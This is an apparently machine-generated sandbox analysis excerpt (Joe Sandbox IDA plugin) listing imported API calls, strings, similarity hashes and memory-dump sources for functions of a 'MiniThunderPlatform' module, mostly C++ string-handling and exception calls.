                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075192
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075215
                                                                                                                                              • memcpy.MSVCR71(000000AC,?,?), ref: 1007523E
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007526B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007529E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10075312
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007531F
                                                                                                                                                • Part of subcall function 1008B0B9: __EH_prolog.LIBCMT ref: 1008B0BE
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0DF
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0EF
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0FF
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@H_prolog$mallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3168742969-0
                                                                                                                                              • Opcode ID: 8673f5cd12c17fd5749157d9eb956ffc49b8067a2fcb973f89705782b7e345ee
                                                                                                                                              • Instruction ID: 3eb2f3cadc2000190810850abd59918923e050d2fbe83369890972ec13d97ddf
                                                                                                                                              • Opcode Fuzzy Hash: 8673f5cd12c17fd5749157d9eb956ffc49b8067a2fcb973f89705782b7e345ee
                                                                                                                                              • Instruction Fuzzy Hash: 80514A71900649DFDB18CBB4C888BDEFBF4FF09301F04865AE4AA93281DB756549CBA0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1023FE38,000000FF,10009AC5,?,?,?,?,?,?,1023FEC1,000000FF,10002F72), ref: 100090D6
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,1023FEC1,000000FF), ref: 100090ED
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,1023FEC1,000000FF), ref: 100090FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C446
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1008C459
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C46A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C47C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1008C48F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C4A0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C4CA
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1008C4DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C4EE
                                                                                                                                                • Part of subcall function 10093B00: RtlEnterCriticalSection.NTDLL(?), ref: 10093B2A
                                                                                                                                                • Part of subcall function 10093B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource_setting array index overflow), ref: 10093B4A
                                                                                                                                                • Part of subcall function 10093B00: _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 10093B6D
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?), ref: 10093B89
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10093B9E
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10093BAB
                                                                                                                                                • Part of subcall function 10093B00: RtlLeaveCriticalSection.NTDLL(?), ref: 10093BB2
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000004,?,00000000,1023FE38,000000FF,1000A4FF), ref: 10009148
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10009156
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10009167
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?assign@?$basic_string@V12@V12@@$CriticalSection$EnterExceptionLeaveThrow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3370856523-0
                                                                                                                                              • Opcode ID: 35018db92ab3bebd8f45e4acb74e8ea9d02454acd35cd4ca20a5eae50a0fcdd8
                                                                                                                                              • Instruction ID: 0dfdcda582e11c660d040ea82f9ae4da52ad2cb7cb98f179b0e87b7184fb5eeb
                                                                                                                                              • Opcode Fuzzy Hash: 35018db92ab3bebd8f45e4acb74e8ea9d02454acd35cd4ca20a5eae50a0fcdd8
                                                                                                                                              • Instruction Fuzzy Hash: D2313C761083819FC325DB24C899BDBBBE8FFA8710F048A4DF59A83251DB346448CB52
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100750B4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750DA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750FA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007510A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007511A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007512A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10075137
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10075144
                                                                                                                                                • Part of subcall function 100897A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,102495B4,000000FF,10073A23), ref: 10089807
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1526739352-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?), ref: 1006C3E3
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1006C3F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006C411
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 1006C42E
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,00000000,?), ref: 1006C668
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,00000000,?), ref: 1006C67A
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 1006C3DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@??3@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 141841468-152884079
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator), ref: 1005533F
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10055351
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005536D
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 1005538A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100555A8
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10055336
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 4260395333-152884079
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD397
                                                                                                                                              • memmove.MSVCR71(00000000,?,?,?,?), ref: 100AD42C
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100AD2A1
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@$memmove
                                                                                                                                              • String ID: .\http_url_range_pipe.cpp$false$operation_ptr == _ayso_io_operation$thunder_assert
                                                                                                                                              • API String ID: 1653989680-652335753
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(adns_fail_cache,cache_millisec,00004E20,-00000004), ref: 100551D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,00000000,102450F7,000000FF,10055E4D,1004853A,1004853A,EC830008), ref: 100551E0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100551EF
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100551F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CountPrivateProfileTick
                                                                                                                                              • String ID: adns_fail_cache$asyn_frame.dat$cache_millisec
                                                                                                                                              • API String ID: 875261409-2267470897
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1004C3E0: RtlInitializeCriticalSection.NTDLL(?), ref: 1004C426
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1004028D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100402A9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100402BF
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100402D2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create event obj error!), ref: 100402E8
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B8AB0,?), ref: 1004030B
                                                                                                                                              Strings
                                                                                                                                              • create event obj error!, xrefs: 100402DF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$CreateCriticalEventExceptionInitializeSectionThrow
                                                                                                                                              • String ID: create event obj error!
                                                                                                                                              • API String ID: 1847905093-811451573
                                                                                                                                              • Opcode ID: 9109a391700c8ccc104fb45aaed8a5b1f35c6288a3c1f4e729edf3b290c5c33c
                                                                                                                                              • Instruction ID: 9cc5d498db5c7fe8a20a93d673084629e93b7db2985005051d1026fc3bf5f5bb
                                                                                                                                              • Opcode Fuzzy Hash: 9109a391700c8ccc104fb45aaed8a5b1f35c6288a3c1f4e729edf3b290c5c33c
                                                                                                                                              • Instruction Fuzzy Hash: 9121A9751047809FD320CFA4C888B9BBBE4FF98B04F50891DF58A87790DBB1A584CB52
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1004406B
                                                                                                                                              • htons.WS2_32(?), ref: 100440E9
                                                                                                                                              • memcpy.MSVCR71(00000000,?,?), ref: 1004416B
                                                                                                                                              • htons.WS2_32(?), ref: 10044182
                                                                                                                                              • inet_addr.WS2_32(-00000004), ref: 1004423C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10044248
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1004426B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 1004429B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$htons$H_prologinet_addrmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1534874130-0
                                                                                                                                              • Opcode ID: 1d396e316b0fc42f870b3eef96dc1b237f52712334a45e46399d535ce8c8e573
                                                                                                                                              • Instruction ID: 9c90d9c54cfddb96ad87de5e6c10a369b32581893d6a5593c88d9fff01ad9682
                                                                                                                                              • Opcode Fuzzy Hash: 1d396e316b0fc42f870b3eef96dc1b237f52712334a45e46399d535ce8c8e573
                                                                                                                                              • Instruction Fuzzy Hash: 2D813875900209DFCB14DFA4C984EEEBBB8FF48314F61852AF916E7251DB70AA44CB64
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A92B1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A92C3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 100A930C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A931A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A9339
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9347
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100A936C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A937A
                                                                                                                                                • Part of subcall function 100D1799: __EH_prolog.LIBCMT ref: 100D179E
                                                                                                                                                • Part of subcall function 100D1799: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100A926F), ref: 100D17BF
                                                                                                                                                • Part of subcall function 100D1799: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,100A926F), ref: 100D17E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$?assign@?$basic_string@V12@V12@@$H_prologmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2786945473-0
                                                                                                                                              • Opcode ID: d9fdefd42537f8b550a39bb395682d41986a67c311326dfe98ec87b34692043e
                                                                                                                                              • Instruction ID: e3db9a3cbca143fce2402fbdcee2bedbef05bd91d01f591ef4ccfc8d40667ea5
                                                                                                                                              • Opcode Fuzzy Hash: d9fdefd42537f8b550a39bb395682d41986a67c311326dfe98ec87b34692043e
                                                                                                                                              • Instruction Fuzzy Hash: 17515A75508341DFD314CF64C898B9BBBE8FB98750F104A1DF59A832A1DBB0A448CF92
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001,00000000,00000000,?,?), ref: 10039669
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000,?,?), ref: 1003969A
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 100396A5
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100396B4
                                                                                                                                                • Part of subcall function 101BC860: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,0000000E,?,?,00000000,?,100396CF), ref: 101BC885
                                                                                                                                                • Part of subcall function 1017EBC0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,00000000,?,10311FB4,00000000,10055817,?,?,00000000,774D23A0,?,?,?,00000000,10245138), ref: 1017EBE5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100396FC
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10039713
